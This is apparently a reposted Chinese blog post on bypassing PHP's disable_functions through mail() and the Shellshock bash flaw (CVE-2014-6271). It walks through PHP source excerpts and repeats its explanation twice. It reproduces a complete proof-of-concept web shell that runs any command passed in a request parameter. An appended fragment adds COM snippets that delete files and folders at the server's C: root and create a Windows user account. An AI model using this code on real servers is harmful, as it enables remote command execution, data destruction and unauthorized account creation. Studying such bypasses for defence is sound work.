PHP Execute Command Bypass Disable_functions
2014-11-18 19:46
471 查看
先简单说一下php调用mail()函数的过程。
看到源码ext/mail.c
236行:
从INI中获得sendmail_path变量。我们看看php.ini里是怎么说明的:
注释中可以看到,send_mail默认值为"sendmail -t -i".
extra_cmd(用户传入的一些额外参数)存在的时候,调用spprintf将sendmail_path和extra_cmd组合成真正执行的命令行sendmail_cmd 。不存在则直接将sendmail_path赋值给sendmail_cmd 。
如下:
之后执行:
将sendmail_cmd丢给popen执行。
如果系统默认sh是bash,popen就会丢给bash执行。而之前的bash破壳(CVE-2014-6271)漏洞,直接导致我们可以利用mail()函数执行任意命令,绕过disable_functions。
影响版本:php 各版本
修复方法:修复CVE-2014-6271
给出POC(http://www.exploit-db.com/exploits/35146/)如下:
看到源码ext/mail.c
236行:
char *sendmail_path = INI_STR("sendmail_path"); char *sendmail_cmd = NULL;
从INI中获得sendmail_path变量。我们看看php.ini里是怎么说明的:
; For Unix only. You may supply arguments as well (default: "sendmail -t -i"). ;sendmail_path =
注释中可以看到,send_mail默认值为"sendmail -t -i".
extra_cmd(用户传入的一些额外参数)存在的时候,调用spprintf将sendmail_path和extra_cmd组合成真正执行的命令行sendmail_cmd 。不存在则直接将sendmail_path赋值给sendmail_cmd 。
如下:
if (!sendmail_path) { #if (defined PHP_WIN32 || defined NETWARE) /* handle old style win smtp sending */ if (TSendMail(INI_STR("SMTP"), &tsm_err, &tsm_errmsg, hdr, subject, to, message, NULL, NULL, NULL TSRMLS_CC) == FAILURE) { if (tsm_errmsg) { php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", tsm_errmsg); efree(tsm_errmsg); } else { php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", GetSMErrorText(tsm_err)); } MAIL_RET(0); } MAIL_RET(1); #else MAIL_RET(0); #endif } if (extra_cmd != NULL) { spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd); } else { sendmail_cmd = sendmail_path; }
之后执行:
#ifdef PHP_WIN32 sendmail = popen_ex(sendmail_cmd, "wb", NULL, NULL TSRMLS_CC); #else /* Since popen() doesn't indicate if the internal fork() doesn't work * (e.g. the shell can't be executed) we explicitly set it to 0 to be * sure we don't catch any older errno value. */ errno = 0; sendmail = popen(sendmail_cmd, "w"); #endif
将sendmail_cmd丢给popen执行。
如果系统默认sh是bash,popen就会丢给bash执行。而之前的bash破壳(CVE-2014-6271)漏洞,直接导致我们可以利用mail()函数执行任意命令,绕过disable_functions。
影响版本:php 各版本
修复方法:修复CVE-2014-6271
给出POC(http://www.exploit-db.com/exploits/35146/)如下:
<?php # Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) # Google Dork: none # Date: 10/31/2014 # Exploit Author: Ryan King (Starfall) # Vendor Homepage: http://php.net # Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror # Version: 5.* (tested on 5.6.2) # Tested on: Debian 7 and CentOS 5 and 6 # CVE: CVE-2014-6271 function shellshock($cmd) { // Execute a command via CVE-2014-6271 @mail.c:283 $tmp = tempnam(".","data"); putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); // In Safe Mode, the user may only alter environment variableswhose names // begin with the prefixes supplied by this directive. // By default, users will only be able to set environment variablesthat // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty, // PHP will let the user modify ANY environment variable! mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actuallysend any mail $output = @file_get_contents($tmp); @unlink($tmp); if($output != "") return $output; else return "No output, or not vuln."; } echo shellshock($_REQUEST["cmd"]); ?>
<?php $mPath = str_repeat(“..”,20); $FSOdelFile = new COM(‘Scripting.FileSystemObject’); //利用了wshom.ocx $FSOdelFile->DeleteFile($mPath.”.*.dat”, True); //删除C区根目录的所有dat文件?> wshom.ocx中的DeleteFolder 利用这个函数可以删除服务器上的文件夹,很恐怖哦。测试代码如下: <?php $mPath = str_repeat(“..”,20); $FSOdelFolder = new COM(‘Scripting.FileSystemObject’); //使用wshom.ocx $FSOdelFolder->DeleteFolder($mPath.”.11″, True); //删除特定的文件夹 ?> 访问之后,成功删除了c:11这个文件夹。 shgina.dll中Create函数创建账户 这个漏洞的测试代码如下: <?php $user = new COM(‘{60664CAF-AF0D-0004-A300-5C7D25FF22A0}’); //利用shgina.dll$user->Create(“asd”); //创建账户asd ?>
相关文章推荐
- PHP Execute Command Bypass Disable_functions
- PHP Execute Command Bypass Disable_functions
- Linux 下用exim4 bypass php disable_functions
- PHP 5.x Shellshock Exploit (bypass disable_functions)
- PHP通过bypass disable functions执行系统命令的方法汇总
- 一些需要禁用的PHP危险函数(disable_functions)
- PHP推荐禁用函数disable_functions PHP安全配置
- php.ini 启用disable_functions提高安全
- PHP利用pcntl_exec突破disable_functions
- 一些需要禁用的PHP危险函数(disable_functions)
- php危险的函数和类 disable_functions/class
- 利用 PHP 扩展模块突破 Disable_functions 执行命令
- 一些需要禁用的PHP危险函数(disable_functions)
- 有些需要禁用的PHP危险函数(disable_functions)
- 一些需要禁用的PHP危险函数(disable_functions)
- 关于 PHP 开放 enable_dl 函数利用 图片Disable_functions
- 一些需要禁用的PHP危险函数(disable_functions)
- PHP中的PDO函数库(PDO Functions)
- 我们平常很少用到的PHP中处理函数的函数(Function Handling Functions)
- PHP - Manual手册 - CLXXXVII. Zip File Functions - Zip文件压缩函数 - 概述